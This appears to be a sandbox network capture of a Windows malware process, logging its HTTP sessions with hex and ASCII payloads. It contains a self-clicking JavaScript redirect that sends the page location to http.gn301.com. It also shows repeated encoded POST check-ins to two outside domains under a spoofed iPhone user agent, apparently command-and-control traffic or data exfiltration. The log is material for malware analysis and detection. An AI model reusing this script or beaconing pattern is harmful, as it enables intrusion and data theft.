Oct 11, 2024 10:05:22.605146885 CEST	557	IN	HTTP/1.0 200 OK Connection: close Cache-Control: max-age=259200 Content-Type: text/html;charset=utf-8 Content-Length: 428 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED] Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>
Oct 11, 2024 10:05:22.612226963 CEST	6	OUT	Data Raw: 4f Data Ascii: O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.11.20	49894	172.247.44.157	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:05:25.125874996 CEST	6	OUT	Data Raw: 50 Data Ascii: P
Oct 11, 2024 10:05:25.281320095 CEST	557	IN	HTTP/1.0 200 OK Connection: close Cache-Control: max-age=259200 Content-Type: text/html;charset=utf-8 Content-Length: 428 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED] Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>
Oct 11, 2024 10:05:25.289159060 CEST	6	OUT	Data Raw: 4f Data Ascii: O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.11.20	49895	172.247.44.157	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:05:27.838587046 CEST	6	OUT	Data Raw: 47 Data Ascii: G
Oct 11, 2024 10:05:28.009913921 CEST	557	IN	HTTP/1.0 200 OK Connection: close Cache-Control: max-age=259200 Content-Type: text/html;charset=utf-8 Content-Length: 428 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED] Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>
Oct 11, 2024 10:05:28.014784098 CEST	6	OUT	Data Raw: 45 Data Ascii: E

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.11.20	49896	91.212.26.5	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:05:33.257131100 CEST	807	OUT	POST /r61b/ HTTP/1.1 Host: www.mjcregionsud.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.mjcregionsud.org Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.mjcregionsud.org/r61b/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 36 6f 47 68 69 4e 54 57 57 58 63 50 2b 41 67 62 64 6a 78 4c 64 61 71 53 34 63 52 6e 6a 42 74 54 4d 45 49 56 64 5a 65 55 6f 71 56 74 59 42 67 37 6f 45 58 4d 4f 6f 59 35 75 65 32 45 52 68 6f 47 30 7a 75 6c 55 41 65 35 78 4c 4e 79 31 7a 6b 33 51 75 57 56 57 6f 52 4e 4c 72 38 57 76 77 63 76 65 33 4f 4b 41 76 70 39 34 4e 59 66 56 6f 75 70 45 39 33 6a 35 30 71 5a 4d 61 4f 45 4f 6f 39 58 6f 36 6a 33 64 4f 54 70 6e 6c 67 74 73 53 35 4f 31 5a 67 5a 6a 73 4c 7a 55 65 77 42 75 34 74 2f 79 66 70 69 50 42 70 47 57 66 6a 4f 44 51 30 4f 59 4a 45 5a 62 35 44 51 58 34 65 54 33 2b 41 68 4b 77 3d 3d Data Ascii: ATk=6oGhiNTWWXcP+AgbdjxLdaqS4cRnjBtTMEIVdZeUoqVtYBg7oEXMOoY5ue2ERhoG0zulUAe5xLNy1zk3QuWVWoRNLr8Wvwcve3OKAvp94NYfVoupE93j50qZMaOEOo9Xo6j3dOTpnlgtsS5O1ZgZjsLzUewBu4t/yfpiPBpGWfjODQ0OYJEZb5DQX4eT3+AhKw==
Oct 11, 2024 10:05:33.432264090 CEST	359	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:05:33 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 196 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.11.20	49897	91.212.26.5	80

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:05:35.967706919 CEST	827	OUT	POST /r61b/ HTTP/1.1 Host: www.mjcregionsud.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.mjcregionsud.org Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.mjcregionsud.org/r61b/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 36 6f 47 68 69 4e 54 57 57 58 63 50 78 42 77 62 53 67 5a 4c 61 36 71 52 6d 4d 52 6e 36 52 74 58 4d 45 4d 56 64 59 71 36 70 59 78 74 59 68 77 37 70 46 58 4d 62 6f 59 35 38 2b 32 42 4d 78 6f 59 30 7a 54 59 55 46 32 35 78 4c 4a 79 31 33 67 33 51 5a 4c 44 56 59 52 4c 41 4c 38 48 79 41 63 76 65 33 4f 4b 41 76 38 31 34 4e 41 66 56 59 2b 70 46 66 66 67 36 30 71 65 45 36 4f 45 46 49 39 70 6f 36 6a 56 64 50 2f 50 6e 6a 38 74 73 54 4a 4f 32 4e 30 61 71 73 4c 78 62 2b 78 73 2b 5a 39 30 2b 4c 42 7a 48 54 4a 50 58 39 33 6e 50 6d 6c 55 46 37 77 39 59 71 66 69 54 49 6e 37 31 38 42 36 58 33 51 34 4e 36 4f 54 46 33 4f 33 4c 4c 6c 34 72 69 34 4a 73 66 51 3d Data Ascii: ATk=6oGhiNTWWXcPxBwbSgZLa6qRmMRn6RtXMEMVdYq6pYxtYhw7pFXMboY58+2BMxoY0zTYUF25xLJy13g3QZLDVYRLAL8HyAcve3OKAv814NAfVY+pFffg60qeE6OEFI9po6jVdP/Pnj8tsTJO2N0aqsLxb+xs+Z90+LBzHTJPX93nPmlUF7w9YqfiTIn718B6X3Q4N6OTF3O3LLl4ri4JsfQ=
Oct 11, 2024 10:05:36.142620087 CEST	359	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:05:36 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 196 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.11.20	49898	91.212.26.5	80

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:05:38.677903891 CEST	2578	OUT	POST /r61b/ HTTP/1.1 Host: www.mjcregionsud.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.mjcregionsud.org Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.mjcregionsud.org/r61b/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 36 6f 47 68 69 4e 54 57 57 58 63 50 78 42 77 62 53 67 5a 4c 61 36 71 52 6d 4d 52 6e 36 52 74 58 4d 45 4d 56 64 59 71 36 70 59 35 74 5a 53 6f 37 70 69 37 4d 4a 59 59 35 2f 2b 32 41 4d 78 70 45 30 7a 37 63 55 46 79 44 78 4e 56 79 32 55 6f 33 42 4e 2f 44 43 6f 52 4c 50 72 39 41 76 77 63 32 65 7a 53 47 41 76 73 31 34 4e 41 66 56 65 79 70 43 4e 33 67 38 30 71 5a 4d 61 4f 41 4f 6f 38 45 6f 36 36 71 64 50 4c 35 6d 51 6b 74 73 7a 5a 4f 6c 4f 4d 61 32 38 4c 76 50 65 78 30 2b 5a 77 73 2b 50 68 52 48 51 55 55 58 2b 6e 6e 66 54 4d 41 47 59 51 59 4c 37 2f 33 61 4a 47 4d 2b 75 5a 61 4f 6c 73 53 4a 5a 37 39 5a 43 7a 69 46 6f 5a 65 77 51 63 32 32 37 64 6b 65 33 2b 42 71 2f 54 2f 58 59 62 56 4f 62 56 59 52 70 34 42 4c 51 4c 49 4f 31 36 43 54 2b 79 65 57 76 4f 58 6b 2b 73 5a 62 31 77 33 77 48 53 77 6d 32 66 79 49 6f 73 6c 66 32 47 64 43 4d 39 75 45 6a 73 36 75 69 4e 74 62 57 76 79 4b 59 2b 5a 51 56 7a 76 65 58 45 50 42 32 31 63 50 68 67 30 39 59 7a 66 4f 2b 52 2b 70 5a 54 67 31 6f 4c 38 46 44 54 68 67 6a [TRUNCATED] Data Ascii: ATk=6oGhiNTWWXcPxBwbSgZLa6qRmMRn6RtXMEMVdYq6pY5tZSo7pi7MJYY5/+2AMxpE0z7cUFyDxNVy2Uo3BN/DCoRLPr9Avwc2ezSGAvs14NAfVeypCN3g80qZMaOAOo8Eo66qdPL5mQktszZOlOMa28LvPex0+Zws+PhRHQUUX+nnfTMAGYQYL7/3aJGM+uZaOlsSJZ79ZCziFoZewQc227dke3+Bq/T/XYbVObVYRp4BLQLIO16CT+yeWvOXk+sZb1w3wHSwm2fyIoslf2GdCM9uEjs6uiNtbWvyKY+ZQVzveXEPB21cPhg09YzfO+R+pZTg1oL8FDThgjYpbqT34Cg837i7gE1ZUPzqGceTN2VBQ1SxifH7Ao47T/EGOs+/i4vdF2GWUC1WPbOER2g44Mo9jUlwHD21HrHKTe3n8fBgeAn/bFr+glqvxjY9AhP7m8wkH4y9SAhdTDAzFOW7MoUOispvjKC/Vo92xWO4giba+lxOGQdUbyUNR6tgFKxzQP8TglGHNX3aCIdjYj2OQlBH9PhYsVQOb8wYmjCj+N6nKxv1lyqbH6BjFviGNOZtsOcHDl6PCIR2Hewxo6nf/XOsr4tt2soAW5wwiQTw428pC+cGPCwN2ikCJK8wPRGJLxQNWjjDCnKTBT2eZe4M/mO1oJRFSXvIZ0+kkrnx7xmB9oQa7f7TXNwMVszG6aPlij/DVlCHt6tHWmlHcPiRHhVR7wxYxeI6GnbUJzZTR/e3oRSJnvLyT4fGrCfsvCNoa9UrvKdfkkEA1wJarEb06Vp71mxB2yQDfpyPMW2qEhftkse+93Ml5Dhukmcs1dH1tyebap7TsYI2vpzzs49JNDeJNEkECR9yxjuV9rLocOg+blN3WuSG1r4t/MwyzHfW8HgYyfUh8frCJsbZxFVUXrEnOX6UbLh0tTaMh1ElROFzWfuCC9PxBSXWjiN7EQnwYll/LoEx+ixNd6oCdrq6BOph78j0Qsk+y++P508wak1H4IQd [TRUNCATED]
Oct 11, 2024 10:05:38.677972078 CEST	5398	OUT	Data Raw: 35 31 4d 4d 6c 6d 64 78 44 67 6a 4e 43 55 48 62 33 41 6b 4d 6e 70 69 56 63 67 4a 45 32 34 69 4a 51 39 48 41 2f 5a 54 68 66 30 2f 4c 56 43 71 32 39 79 42 5a 57 68 77 4c 79 56 57 79 41 57 66 53 41 4f 48 78 44 4b 6f 32 4d 39 67 46 44 46 33 6b 31 68 Data Ascii: 51MMlmdxDgjNCUHb3AkMnpiVcgJE24iJQ9HA/ZThf0/LVCq29yBZWhwLyVWyAWfSAOHxDKo2M9gFDF3k1hQntQtHGYZYrmrzAQR709dFlTbhljiYJbLd+WE19EXlyasdhB39/zwJItvIdpCcO8O5Upg6OKlKRd9xUH8eIOd447ieiQ2btya1GqTujvI+jGi9ilKjwCEcuXoaBzNcMOQtm914ewrlaUNKalpScwn+bOawxJFbu4A
Oct 11, 2024 10:05:38.854429960 CEST	359	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:05:38 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 196 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.11.20	49899	91.212.26.5	80

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:05:41.377703905 CEST	544	OUT	GET /r61b/?ATk=3quBh4mzL0lL+B9uaB4+B/ehh8Vuymt6GENoLoKygJVSWFdT0X7NdoMT/6uiE3Ni1BD7Zx2rh99upTwYdPvuPJZKDP4PvDgre2/rGfgIw+gfAM2DFPuj10Q=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.mjcregionsud.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:05:41.552983046 CEST	359	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:05:41 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 196 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.11.20	49900	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:05:46.666698933 CEST	825	OUT	POST /kbee/ HTTP/1.1 Host: www.levelsabovetravel.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.levelsabovetravel.info Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.levelsabovetravel.info/kbee/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 4f 41 49 7a 4c 73 6b 44 2f 39 79 2b 7a 5a 32 6b 6f 5a 41 78 52 6a 31 45 4d 4d 7a 35 6c 52 71 30 72 63 78 31 38 37 4e 59 79 33 78 54 72 65 64 34 66 74 44 33 4a 69 35 6e 68 4f 4c 2f 5a 62 6b 34 68 47 76 4c 79 6a 33 69 6a 46 45 44 33 4b 52 30 68 2b 7a 31 42 75 64 6d 55 32 47 52 4b 68 59 50 78 77 78 41 49 49 34 4a 56 4b 44 2b 6b 38 54 6d 2f 69 6f 64 75 56 48 33 74 32 33 42 4f 6a 6b 63 63 31 71 4e 71 78 39 31 7a 71 73 6c 31 4e 76 68 7a 7a 42 50 46 76 67 44 36 39 56 59 30 39 61 78 69 4f 76 31 32 33 71 45 4a 65 63 2f 48 69 73 68 48 2b 44 4e 4d 73 48 39 6e 59 52 74 55 34 62 6c 43 51 3d 3d Data Ascii: ATk=OAIzLskD/9y+zZ2koZAxRj1EMMz5lRq0rcx187NYy3xTred4ftD3Ji5nhOL/Zbk4hGvLyj3ijFED3KR0h+z1BudmU2GRKhYPxwxAII4JVKD+k8Tm/ioduVH3t23BOjkcc1qNqx91zqsl1NvhzzBPFvgD69VY09axiOv123qEJec/HishH+DNMsH9nYRtU4blCQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.11.20	49901	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:05:49.306685925 CEST	845	OUT	POST /kbee/ HTTP/1.1 Host: www.levelsabovetravel.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.levelsabovetravel.info Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.levelsabovetravel.info/kbee/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 4f 41 49 7a 4c 73 6b 44 2f 39 79 2b 77 39 79 6b 71 37 6f 78 57 44 31 48 4a 4d 7a 35 71 78 71 34 72 63 4e 31 38 36 49 64 7a 46 56 54 6f 38 56 34 65 73 44 33 46 43 35 6e 31 65 4c 77 55 37 6b 33 68 48 53 32 79 68 6a 69 6a 45 67 44 33 4c 68 30 68 73 62 79 42 2b 64 6b 59 57 47 54 46 42 59 50 78 77 78 41 49 49 38 6e 56 4c 72 2b 6b 50 4c 6d 74 51 51 65 77 6c 48 30 73 32 33 42 5a 7a 6b 59 63 31 72 67 71 77 51 51 7a 6f 55 6c 31 4d 66 68 7a 68 70 4d 50 76 67 2f 30 64 55 4f 34 39 2f 64 6f 4b 50 4a 37 6b 32 38 47 75 41 6b 50 55 39 37 61 4d 33 70 50 2f 62 50 6a 6f 6f 46 57 36 61 2b 66 65 6c 6f 72 4c 56 34 41 70 68 36 38 42 49 55 55 74 2b 6c 64 73 30 3d Data Ascii: ATk=OAIzLskD/9y+w9ykq7oxWD1HJMz5qxq4rcN186IdzFVTo8V4esD3FC5n1eLwU7k3hHS2yhjijEgD3Lh0hsbyB+dkYWGTFBYPxwxAII8nVLr+kPLmtQQewlH0s23BZzkYc1rgqwQQzoUl1MfhzhpMPvg/0dUO49/doKPJ7k28GuAkPU97aM3pP/bPjooFW6a+felorLV4Aph68BIUUt+lds0=

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.11.20	49902	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:05:51.948482990 CEST	2578	OUT	POST /kbee/ HTTP/1.1 Host: www.levelsabovetravel.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.levelsabovetravel.info Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.levelsabovetravel.info/kbee/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 4f 41 49 7a 4c 73 6b 44 2f 39 79 2b 77 39 79 6b 71 37 6f 78 57 44 31 48 4a 4d 7a 35 71 78 71 34 72 63 4e 31 38 36 49 64 7a 46 64 54 72 50 4e 34 66 50 62 33 45 43 35 6e 70 75 4b 33 55 37 6b 71 68 48 4c 78 79 68 66 49 6a 48 49 44 32 70 5a 30 32 6f 50 79 4c 2b 64 6b 48 6d 47 57 4b 68 5a 56 78 77 42 45 49 49 4d 6e 56 4c 72 2b 6b 4f 37 6d 75 43 6f 65 79 6c 48 33 74 32 33 7a 4f 6a 6c 4e 63 31 44 65 71 77 55 75 77 59 30 6c 30 73 50 68 78 53 42 4d 44 76 67 39 33 64 55 47 34 39 44 43 6f 4f 76 2f 37 67 32 57 47 75 34 6b 4e 79 42 67 42 50 79 31 52 70 6e 7a 70 37 73 6c 43 61 36 35 58 74 39 69 72 70 4a 32 48 65 